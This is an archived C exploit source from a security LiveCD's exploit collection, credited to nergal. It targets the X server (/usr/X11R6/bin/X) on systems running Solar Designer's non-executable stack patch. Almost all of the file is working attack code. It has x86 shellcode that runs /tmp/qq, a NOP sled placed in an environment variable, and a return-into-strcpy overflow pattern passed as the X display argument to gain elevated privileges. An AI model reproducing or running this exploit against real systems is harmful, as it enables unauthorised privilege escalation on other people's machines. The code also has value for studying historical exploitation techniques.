home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
xwin
/
x1.c
< prev
next >
Wrap
C/C++ Source or Header
|
2005-02-12
|
2KB
|
66 lines
/*
** Exploit no 1 for Solar Designer patch
** by nergal@icm.edu.pl
** This code is meant for educational and entertaining purposes only.
** You can distribute it freely provided credits are given.
**
*/
#include <stdio.h>
/* change the following 0 if the code doesn't work */
#define OFFSET 0
#define BUFFER_SIZE 370
#define EGG_SIZE 2048
#define NOP 0x90
/* any address in data segment */
#define DEST 0x08223038
/* strcpy linkage table entry */
#define STRCPY 0x08066a18
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/qq";
char buf[BUFFER_SIZE];
char egg[EGG_SIZE];
char pattern[16];
void main(int argc, char **argv)
{
/* try alignment in 3..18; three worked for me */
int i, align = 3;
int src = (int) &src - OFFSET; /* formerly known as get_sp() :) */
if (argc == 2)
align = atoi(argv[1]);
*(int *) pattern = STRCPY;
*(int *) (pattern + 4) = DEST;
*(int *) (pattern + 8) = DEST;
*(int *) (pattern + 12) = src;
for (i = 0; i <= 15; i++)
if (pattern[i] == 0)
{
printf("zero in pattern (%i)\n", i);
exit(1);
}
memset(buf, ' ', BUFFER_SIZE);
buf[BUFFER_SIZE - 1] = 0;
buf[0] = ':';
buf[1] = '9';
for (i = align; i < BUFFER_SIZE - 16; i += 16)
memcpy(buf + i, pattern, 16);
memset(egg, NOP, EGG_SIZE);
strcpy(egg + EGG_SIZE - strlen(shellcode) - 2, shellcode);
strncpy(egg, "EGG=", 4);
putenv(egg);
execl("/usr/X11R6/bin/X", "X", buf, "-nolock", 0);
perror("execl");
}
/* www.hack.co.za [2000]*/
